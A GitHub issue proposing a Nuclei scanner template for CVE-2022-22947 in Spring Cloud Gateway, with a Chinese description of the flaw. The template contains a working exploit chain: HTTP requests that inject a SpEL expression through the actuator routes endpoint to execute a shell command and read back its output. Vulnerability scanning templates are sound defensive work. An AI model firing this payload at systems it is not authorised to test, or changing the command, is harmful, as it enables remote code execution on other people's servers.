### ISSUE TITLE
CVE-2022-22947

### ISSUE THREAD

**Issue by GitlXl** [projectdiscovery/nuclei-templates#3833]
```yaml
id: CVE-2022-22947

info:
  name: spring_cloud_RCE
  author: leesin_1973
  severity: critical
  description: 
    Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的网关，它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式，3月1日，VMware发布安全公告，Spring Cloud Gateway中存在远程代码执行漏洞（CVE-2022-22947），该漏洞的CVSSv3评分为10.0。当启用或暴露不安全的 Gateway Actuator 端点时，使用 Spring Cloud Gateway 的应用程序容易受到代码注入攻击，远程攻击者可以通过发送恶意请求以执行任意代码。
  reference:
    - https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947
  classification:
    cvss-score: 10.0
    cve-id: CVE-2022-22947
  tags: cve,rce

requests:
  - raw:
      - |
        POST /actuator/gateway/routes/hacktest HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
        "id": "hacktest",
        "filters": [{
          "name": "AddResponseHeader",
          "args": {
            "name": "Result",
            "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
          }
        }],
        "uri": "http://example.com"
        }

        id=1


      - |
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        id=2


      - |
        GET /actuator/gateway/routes/hacktest HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        id=3


      - |
        DELETE /actuator/gateway/routes/hacktest  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        id=4
        
    threads: 1

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "uid="

      - type: status
        status:
          - 200
```
